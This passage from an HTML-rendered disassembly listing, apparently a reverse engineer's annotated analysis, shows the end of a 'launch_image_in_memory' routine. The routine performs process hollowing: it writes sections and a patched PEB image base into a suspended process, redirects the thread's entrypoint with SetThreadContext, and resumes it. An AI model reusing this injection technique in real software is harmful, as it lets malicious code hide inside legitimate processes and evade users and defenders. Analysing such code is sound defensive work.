</span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">24h</span><span style="color:navy">]</span> ; characteristics of n-th section <span style="color:black">CODE:00402636 </span><span style="color:green">174 </span><span style="color:navy">call </span>convert_section_characteristics_2_memory_protection <span style="color:black">CODE:00402636 </span><span style="color:black">CODE:0040263B </span><span style="color:black">CODE:0040263B </span>; apply memory protection "characteristics" <span style="color:black">CODE:0040263B </span><span style="color:black">CODE:0040263B </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; flNewProtect <span style="color:black">CODE:0040263C </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">8</span><span style="color:navy">]</span> ; virtual size of n-th section <span style="color:black">CODE:00402640 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; dwSize <span style="color:black">CODE:00402641 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">0Ch</span><span style="color:navy">]</span> ; virtual address of n-th section <span style="color:black">CODE:00402645 </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402648 </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpAddress <span style="color:black">CODE:00402649 </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040264C </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:0040264D </span><span style="color:green">184 </span><span style="color:navy">call </span>VirtualProtectEx <span style="color:black">CODE:0040264D </span><span style="color:black">CODE:00402652 </span><span style="color:black">CODE:00402652 </span><span style="color:gray">err_writeprocmem</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+1ACj </span><span style="color:black">CODE:00402652 </span><span style="color:green">170 </span><span style="color:navy">inc ebx</span> ; next section <span style="color:black">CODE:00402653 </span><span style="color:green">170 </span><span style="color:navy">dec dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">54h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402656 </span><span style="color:green">170 </span><span style="color:navy">jnz short </span><span style="color:gray">insert_section_into_process_space</span> <span style="color:black">CODE:00402656 </span><span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span>; the loader exploits the fact that ebx points <span style="color:black">CODE:00402658 </span>; to the PEB at process start. <span style="color:black">CODE:00402658 </span>; so by patching the DWORD pointed to by ebx+8, <span style="color:black">CODE:00402658 </span>; the loader sets a new ImageBaseAddress within <span style="color:black">CODE:00402658 </span>; the PEB structure <span style="color:black">CODE:00402658 </span>; (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html) <span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span><span style="color:black">CODE:00402658 </span><span style="color:gray">err_no_more_sections</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+17Dj </span><span style="color:black">CODE:00402658 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">64h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040265B </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpNumberOfBytesWritten <span style="color:black">CODE:0040265C </span><span style="color:green">174 </span><span style="color:navy">push </span><span style="color:green">4</span> ; nSize <span style="color:black">CODE:0040265E </span><span style="color:green">178 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402661 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; lpBuffer <span style="color:black">CODE:00402662 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess._Ebx</span><span style="color:navy">]</span> <span style="color:black">CODE:00402668 </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, </span><span style="color:green">8</span> <span style="color:black">CODE:0040266B </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpBaseAddress <span style="color:black">CODE:0040266C </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040266F </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:00402670 </span><span style="color:green">184 </span><span style="color:navy">call </span>WriteProcessMemory <span style="color:black">CODE:00402670 </span><span style="color:black">CODE:00402675 </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402677 </span><span style="color:green">170 </span><span style="color:navy">jz short </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:00402677 </span><span style="color:black">CODE:00402679 </span><span style="color:black">CODE:00402679 </span>; get AddressOfEntrypoint, add address of image <span style="color:black">CODE:00402679 </span>; in memory and set eax of the target process to <span style="color:black">CODE:00402679 </span>; that address <span style="color:black">CODE:00402679 </span><span style="color:black">CODE:00402679 </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> ; PE header <span style="color:black">CODE:0040267C </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">28h</span><span style="color:navy">]</span> ; PE header + 0x28 = address of entrypoint <span style="color:black">CODE:0040267F </span><span style="color:green">170 </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402682 </span><span style="color:green">170 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess._Eax</span><span style="color:navy">]</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402688 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess</span><span style="color:navy">]</span> <span style="color:black">CODE:0040268E </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpContext <span style="color:black">CODE:0040268F </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">48h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402692 </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; hThread <span style="color:black">CODE:00402693 </span><span style="color:green">178 </span><span style="color:navy">call </span>SetThreadContext <span style="color:black">CODE:00402693 </span><span style="color:black">CODE:00402698 </span><span style="color:green">170 </span><span style="color:navy">cmp eax</span><span style="color:navy">, </span><span style="color:green">1</span> <span style="color:black">CODE:0040269B </span><span style="color:green">170 </span><span style="color:navy">sbb eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040269D </span><span style="color:green">170 </span><span style="color:navy">inc eax</span> <span style="color:black">CODE:0040269E </span><span style="color:green">170 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span><span style="color:navy">, al</span> <span style="color:black">CODE:0040269E </span><span style="color:black">CODE:004026A1 </span><span style="color:black">CODE:004026A1 </span><span style="color:gray">err_ldrfailure</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+C4j </span><span style="color:black">CODE:004026A1 </span><span style="color:green">; launch_image_in_memory+E9j ... </span><span style="color:black">CODE:004026A1 </span><span style="color:green">170 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004026A3 </span><span style="color:green">170 </span><span style="color:navy">pop edx</span> <span style="color:black">CODE:004026A4 </span><span style="color:green">16C </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026A5 </span><span style="color:green">168 </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026A6 </span><span style="color:green">164 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, edx</span> <span style="color:black">CODE:004026A9 </span><span style="color:green">164 </span><span style="color:navy">push offset </span><span style="color:gray">err_createproc</span> <span style="color:black">CODE:004026A9 </span><span style="color:black">CODE:004026AE </span><span style="color:black">CODE:004026AE </span><span style="color:navy">loc_4026AE: </span><span style="color:green">; CODE XREF: launch_image_in_memory+253j </span><span style="color:black">CODE:004026AE </span><span style="color:green">168 </span><span style="color:navy">cmp [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">0</span> <span style="color:black">CODE:004026B2 </span><span style="color:green">168 </span><span style="color:navy">jnz short </span><span style="color:gray">resume_process</span> <span style="color:black">CODE:004026B2 </span><span style="color:black">CODE:004026B4 </span><span style="color:black">CODE:004026B4 </span>; on failure, terminate process <span style="color:black">CODE:004026B4 </span><span style="color:black">CODE:004026B4 </span><span style="color:green">168 </span><span style="color:navy">push </span><span style="color:green">0</span> ; uExitCode <span style="color:black">CODE:004026B6 </span><span style="color:green">16C </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026B9 </span><span style="color:green">16C </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:004026BA </span><span style="color:green">170 </span><span style="color:navy">call </span>TerminateProcess <span style="color:black">CODE:004026BA </span><span style="color:black">CODE:004026BF </span><span style="color:green">168 </span><span style="color:navy">jmp short loc_4026CA</span> <span style="color:black">CODE:004026BF </span><span style="color:black">CODE:004026C1 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026C1 </span><span style="color:black">CODE:004026C1 </span><span style="color:gray">resume_process</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+232j </span><span style="color:black">CODE:004026C1 </span><span style="color:green">168 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">48h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026C4 </span><span style="color:green">168 </span><span style="color:navy">push eax</span> ; hThread <span style="color:black">CODE:004026C5 </span><span style="color:green">16C </span><span style="color:navy">call </span>ResumeThread <span style="color:black">CODE:004026C5 </span><span style="color:black">CODE:004026CA </span><span style="color:black">CODE:004026CA </span><span style="color:navy">loc_4026CA: </span><span style="color:green">; CODE XREF: launch_image_in_memory+23Fj </span><span style="color:black">CODE:004026CA </span><span style="color:green">168 </span><span style="color:navy">mov bl</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span> <span style="color:black">CODE:004026CD </span><span style="color:green">168 </span><span style="color:navy">retn </span><span style="color:black">CODE:004026CD </span><span style="color:black">CODE:004026CE </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026CE </span><span style="color:black">CODE:004026CE </span><span style="color:navy">loc_4026CE: </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+9Do </span><span style="color:black">CODE:004026CE </span><span style="color:green">164 </span><span style="color:navy">jmp loc_401A3C</span> <span style="color:black">CODE:004026CE </span><span style="color:black">CODE:004026D3 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026D3 </span><span style="color:green">164 </span><span style="color:navy">jmp short loc_4026AE</span> <span style="color:black">CODE:004026D3 </span><span style="color:black">CODE:004026D5 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026D5 </span><span style="color:black">CODE:004026D5 </span><span style="color:gray">err_createproc</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+90j </span><span style="color:black">CODE:004026D5 </span><span style="color:green">; launch_image_in_memory+24Dj </span><span style="color:black">CODE:004026D5 </span><span style="color:#8080ff">; DATA XREF: ... </span><span style="color:black">CODE:004026D5 </span><span style="color:green">164 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004026D7 </span><span style="color:green">164 </span><span style="color:navy">pop edx</span> <span style="color:black">CODE:004026D8 </span><span style="color:green">160 </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026D9 </span><span style="color:green">15C </span><span style="color:navy">pop ecx</span> <span style="color:black">CODE:004026DA </span><span style="color:green">158 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, edx</span> <span style="color:black">CODE:004026DD </span><span style="color:green">158 </span><span style="color:navy">push offset loc_4026F7</span> <span style="color:black">CODE:004026DD </span><span style="color:black">CODE:004026E2 </span><span style="color:black">CODE:004026E2 </span><span style="color:navy">loc_4026E2: </span><span style="color:green">; CODE XREF: launch_image_in_memory+275j </span><span style="color:black">CODE:004026E2 </span><span style="color:green">15C </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">70h</span><span style="color:navy">]</span> <span style="color:black">CODE:004026E5 </span><span style="color:green">15C </span><span style="color:navy">mov edx</span><span style="color:navy">, </span><span style="color:green">2</span> <span style="color:black">CODE:004026EA </span><span style="color:green">15C </span><span style="color:navy">call sub_401C90</span> <span style="color:black">CODE:004026EA </span><span style="color:black">CODE:004026EF </span><span style="color:green">15C </span><span style="color:navy">retn </span><span style="color:black">CODE:004026EF </span><span style="color:black">CODE:004026F0 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F0 </span><span style="color:black">CODE:004026F0 </span><span style="color:navy">loc_4026F0: </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+28o </span><span style="color:black">CODE:004026F0 </span><span style="color:green">158 </span><span style="color:navy">jmp loc_401A3C</span> <span style="color:black">CODE:004026F0 </span><span style="color:black">CODE:004026F5 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F5 </span><span style="color:green">158 </span><span style="color:navy">jmp short loc_4026E2</span> <span style="color:black">CODE:004026F5 </span><span style="color:black">CODE:004026F7 </span><span style="color:gray">; --------------------------------------------------------------------------- </span><span style="color:black">CODE:004026F7 </span><span style="color:black">CODE:004026F7 </span><span style="color:navy">loc_4026F7: </span><span style="color:green">; CODE XREF: launch_image_in_memory+26Fj </span><span style="color:black">CODE:004026F7 </span><span style="color:#8080ff">; DATA XREF: launch_image_in_memory+25Do </span><span style="color:black">CODE:004026F7 </span><span style="color:green">15C </span><span style="color:navy">mov eax</span><span style="color:navy">, ebx</span> <span style="color:black">CODE:004026F9 </span><span style="color:green">15C </span><span style="color:navy">pop edi</span> <span style="color:black">CODE:004026FA </span><span style="color:green">158 </span><span style="color:navy">pop esi</span> <span style="color:black">CODE:004026FB </span><span style="color:green">154 </span><span style="color:navy">pop ebx</span> <span style="color:black">CODE:004026FC </span><span style="color:green">150 </span><span style="color:navy">mov esp</span><span style="color:navy">, ebp</span> <span style="color:black">CODE:004026FE </span><span style="color:green">008 </span><span style="color:navy">pop ebp</span> <span style="color:black">CODE:004026FF </span><span style="color:green">004 </span><span style="color:navy">retn </span><span style="color:green">4</span> <span style="color:black">CODE:004026FF </span><span style="color:black">CODE:004026FF </span><span style="background:red">launch_image_in_memory endp</span><span style="background:red"> ; sp-analysis failed</span> <span style="color:black">CODE:004026FF </span><span style="color:black">CODE:004026FF </span><span style="color:gray">; --------------------------------------------------------------------------- </span> </pre> </span> </body> </html>